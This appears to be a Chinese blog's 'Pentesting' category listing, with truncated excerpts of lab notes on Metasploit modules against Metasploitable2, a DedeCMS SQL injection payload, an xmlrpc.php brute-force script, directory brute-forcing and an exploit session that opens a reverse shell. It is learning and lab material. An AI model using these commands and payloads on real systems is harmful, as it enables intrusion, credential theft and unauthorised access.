Pentesting
文章平均质量分 60
Nixawk
这个作者很懒,什么都没留下…
展开
-
Sejda -- split pdf bookmark
root@AA:~/Desktop# sejda12:30:01.911 Configuring Sejda 1.0.0.M912:30:01.944 Loading Sejda configuration form default sejda.xml12:30:02.298 Starting execution with arguments: ''12:30:02.298 Jav原创 2014-02-21 12:35:32 · 1510 阅读 · 0 评论 -
bork file encrypter
http://sourceforge.net/projects/bork/root@fedora:~# ls -ltotal 28drwxr-xr-x 6 root root 4096 2014-02-25 21:42 bork-1.4drwxr-xr-x 4 root root 4096 2014-02-25 21:50 Desktop-rw-r--r-- 1 roo原创 2014-02-25 23:00:49 · 881 阅读 · 0 评论 -
GNU PRIVACY HANDBOOK
********************GNU PRIVACY HANDBOOK********************http://www.gnupg.org/documentation/howtos.htmlhttp://www.gnupg.org/documentation/manuals.htmlhttp://www.gnupg.org/documentation/gu原创 2014-02-20 12:47:25 · 1238 阅读 · 0 评论 -
获取文件路径及时间
@echo offREM list files with timestampREM Filename first then timestampfor /F %%I in ('dir /A:D /b /s D:\') do (REN echo %%~fIfor /F %%a in ('dir /A:A-D /b /s %%~fI\*.*') do @echo %%~fa %%~ta)原创 2014-04-15 12:36:22 · 625 阅读 · 0 评论 -
php -- cookie 后门
http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html原创 2014-04-30 09:39:18 · 1537 阅读 · 0 评论 -
[分析]-DedeCMS全版本通杀SQL注入漏洞
mysql> SELECT s.*,t.* FROM -> `dede_member_stow` AS s LEFT JOIN -> `dede_member_stowtype` AS t ON s.type=t.stowname -> WHERE s.aid='1' -> AND s.type='\\' or mid=@`\\'` /*!50000unio原创 2014-05-04 16:15:59 · 5583 阅读 · 0 评论 -
SMB
MicrosoftSMB Protocol Packet Exchange Scenario此处介绍一下,在客户端与服务端之间MicrosoftSMB Protocol的交换过程,整个过程如下所示:客户端与服务端建立一个NetBIOS会话.客户端与服务端协商MicrosoftSMB协议.客户端登陆到服务端.客户端访问服务端共享.客户端打开原创 2014-04-20 13:41:59 · 846 阅读 · 0 评论 -
情报搜集阶段
├─1.Network Analysis│ ├─1.IP Analysis│ ├─2.Whois Analysis│ ├─3.DNS Analysis│ ├─4.Identify Live Hosts│ ├─5.Network Scanners│ ├─6.Network Traffic Analysis│ ├─7.OS Fingerprinting│原创 2014-04-21 09:46:44 · 1062 阅读 · 0 评论 -
NETBIOS
NETBIOS协议是由IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的统一的命令集,作用是为了给局域网提供网络以及其他特殊功能,系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,实现信息通讯,所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的原创 2014-04-19 17:02:13 · 2900 阅读 · 0 评论 -
Abusing MySQL string arithmetic for tiny SQL injections
测试平台: backtrack r3x86MYSQL版本: mysql-5.1.63光看上面的warnings有人可能不信,特作下面的验证.能完成数值类型转换的表达式均可, 例如: select username,password from users where username= '' +0;原创 2014-04-23 12:20:21 · 674 阅读 · 0 评论 -
mysql -- 手工注入
------------------[index1.php源码]------------------ID:------------------[index2.php源码]------------------$con = mysql_connect("localhost","root","fuckyou");mysql_select_db("mytestdb"原创 2014-04-22 13:58:06 · 6442 阅读 · 0 评论 -
黑客小游戏 -- 图片帧提取
http://www.fj543.com/hack/?level=75901原创 2014-05-15 10:17:18 · 1138 阅读 · 0 评论 -
python -- 密码生成器
代码可能写的特别粗糙, 请自行优化.#!/usr/bin/env pythonimport itertoolsimport stringimport sysdef usage(): print "Password generator - v1.0 " print "\t%s [type] [length]" % sys.argv[0] print "\原创 2014-05-16 18:07:57 · 948 阅读 · 0 评论 -
服务商 dns 劫持
今天写一个小脚本的时候发现, dns服务商的小手段.原创 2014-05-17 13:44:12 · 711 阅读 · 0 评论 -
python - 文件枚举
有时候做测试,需要生成文件列表,今天写个原创 2014-05-17 23:08:45 · 847 阅读 · 0 评论 -
Metasploit渗透测试指南
Metasploit渗透测试指南1.1 PTES标准中的渗透测试阶段PTES标准中的渗透测试阶段是用来定义渗透测试过程,并确保客户组织能够以一种标准化的方式来扩展一次渗透测试,而无论是由谁来执行这种类型的评估。该标准将渗透测试过程分为七个阶段,并在每个阶段中定义不同的扩展级别,而选择哪种级别则由被攻击测试的客户组织所决定。现在设想你就是一名渗透测试者,让我们带领你了原创 2014-04-21 09:15:14 · 1836 阅读 · 0 评论 -
curl -- The Art of Scripting HTTP Requests Using Curl
curl http://site.{one,two,three}.comcurl ftp://ftp.numericals.com/file[1-100].txtcurl ftp://ftp.numericals.com/file[001-100].txtcurl http://any.org/archive[1996-1999]/vol[1-4]/part{a,b,c}.html原创 2013-12-10 16:48:08 · 1261 阅读 · 0 评论 -
metasploit + openvas
root@gnu:~# openvas-start Starting OpenVas ServicesStarting Greenbone Security Assistant: gsad.Starting OpenVAS Scanner: openvassd.Starting OpenVAS Administrator: openvasad.Starting OpenVAS原创 2014-07-18 23:32:03 · 1948 阅读 · 0 评论 -
Install Cobalt Strike on Kali Linux
Install Cobalt Strike on Kali LinuxDependenciesKali Linux ships with the dependencies needed to use Cobalt Strike. The Metasploit Framework and Java are already setup for you.Installation Steps原创 2014-07-21 12:24:40 · 2908 阅读 · 0 评论 -
HTTP(S) directory/file brute forcer
root@gnu:~# dirs3arch -u http://www.example.com/ -e php -w /usr/share/dirs3arch/db/dirbuster/directory-list-2.3-small.txt -l -r -t 10 --user-agent "Mozilla" --no-follow-redirects -o example.txt原创 2014-07-20 21:45:22 · 743 阅读 · 0 评论 -
Oracle Attack Methodology
Oracle Attack Methodology1. Locate Oracle Version2. Determine Oracle Version3. Determine Oracle SID4. Guess/Bruteforce USER/PASS5. Privilege Escalation via SQL Injection6. Manipulate Data/原创 2014-07-21 15:45:53 · 1019 阅读 · 0 评论 -
Extracting Metada From Files
root@gnu:~# exiftool 123.doc ExifTool Version Number : 8.60File Name : 123.docDirectory : .File Size : 131 kBFile Mo转载 2014-07-21 16:43:46 · 1257 阅读 · 0 评论 -
xmlrpc.php brute attack
#!/usr/bin/env python# -*- coding: utf8 -*-import sysimport httplibfrom urllib2 import urlopen, HTTPError, URLErrorfrom xml.dom.minidom import parseStringfrom xml.parsers.expat import ExpatErr原创 2014-07-24 01:08:06 · 1217 阅读 · 0 评论 -
Blind SQL Injection
https://www.owasp.org/index.php/Blind_SQL_Injection原创 2014-04-23 10:42:53 · 1350 阅读 · 0 评论 -
hash 类型探测
https://code.google.com/p/hash-identifier/原创 2014-05-14 10:33:29 · 501 阅读 · 0 评论 -
linux -- 搭建wifi热点
[Lab]: Linux gnu 3.2.0-4-amd64 #1 SMP Debian 3.2.57-3+deb7u1 x86_64 GNU/Linux原创 2014-06-17 01:12:21 · 1441 阅读 · 0 评论 -
curl - Bug
[Windows 7 + Cygwin + Curl]============================================OS Name: Microsoft Windows 7 UltimateOS Version: 6.1.7601 Service Pack 1 Build 7601Cygwi原创 2013-12-11 09:51:14 · 1338 阅读 · 0 评论 -
dnsrecon 侦察
http://pentestlab.wordpress.com/tag/dnsrecon/Standard Record Enumeration原创 2014-07-19 23:12:14 · 4083 阅读 · 0 评论 -
Metasploitable2 - tcp port 5432 - postgres
msf auxiliary(postgres_readfile) > show options Module options (auxiliary/admin/postgres/postgres_readfile): Name Current Setting Required Description ---- --------------- -原创 2014-07-31 23:51:09 · 1156 阅读 · 0 评论 -
Metasploitable2 - tcp port 2049 - NFS
nfs 2049/tcp #Network File System - Sun Microsystemsshilp 2049/tcp #nfs 2049/udp #Network File System - Sun Microsystemsshilp 2049/udp #nfs --原创 2014-07-31 22:46:30 · 1669 阅读 · 0 评论 -
Metasploit2 - tcp port 1099 - RMI
Java 远程方法调用(Remote Method Invocation, RMI)使得运行在一个 Java 虚拟机(Java Virtual Machine, JVM)的对象可以调用运行另一个 JVM 之上的其他对象的方法,从而提供了程序间进行远程通讯的途径。RMI 是 J2EE 的很多分布式技术的基础。推荐阅读: http://www.blogjava.net/boddi/archive/20原创 2014-07-31 22:06:56 · 915 阅读 · 0 评论 -
Metasploitable2 - tcp port 5900 - vnc
msf > use auxiliary/scanner/vnc/vnc_loginmsf auxiliary(vnc_login) > set RHOSTS 192.168.1.111RHOSTS => 192.168.1.111msf auxiliary(vnc_login) > set BLANK_PASSWORDS trueBLANK_PASSWORDS => truem原创 2014-08-01 00:00:57 · 1528 阅读 · 0 评论 -
Metasploitable2 - tcp port 3632 - distccd
msf exploit(distcc_exec) > set RHOST 192.168.1.111RHOST => 192.168.1.111msf exploit(distcc_exec) > run[*] Started reverse double handler[*] Accepted the first client connection...[*] Accep原创 2014-07-31 23:44:12 · 886 阅读 · 0 评论 -
Metasploitable2 - tcp port 3306 - mysql
msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- ---------------原创 2014-07-31 23:42:13 · 1891 阅读 · 0 评论 -
SecOS Chanllenge
http://resources.infosecinstitute.com/secos-challenge/#comment-1182247原创 2014-07-27 01:28:32 · 1169 阅读 · 0 评论 -
nmap -- [ip-geolocation-maxmind]
插件ip-location-maxmind,可以帮助nmap获取ip的geo信息。官方说明:http://nmap.org/nsedoc/scripts/ip-geolocation-maxmind.html数据库:http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.g原创 2014-07-27 16:43:56 · 1127 阅读 · 0 评论 -
Metasploitable2 - tcp port 2121 - Proftp
msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set USERNAME msfadminUSERNAME => msfadminmsf auxiliary(ftp_login) > set PASSWORD msfadminPASSWORD => msfadminmsf auxiliar原创 2014-07-31 23:26:24 · 2326 阅读 · 0 评论 -
http version scan
介绍一下nmap与metasploit如何获取 http versionxi原创 2014-07-28 11:53:28 · 1271 阅读 · 0 评论 -
Metasploit - postgres
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.107 RHOSTS => 192.168.1.107msf auxiliary(postgres_login) > set USERNAME postgresUSERNAME => postgresmsf auxiliary(postgres_login) > set PASSWOR原创 2014-08-03 22:35:35 · 1128 阅读 · 0 评论 -
metasploit + dns_bruteforce
auxiliary/gather/dns_bruteforce 模块可以用于猜jie原创 2014-07-28 17:27:28 · 1169 阅读 · 0 评论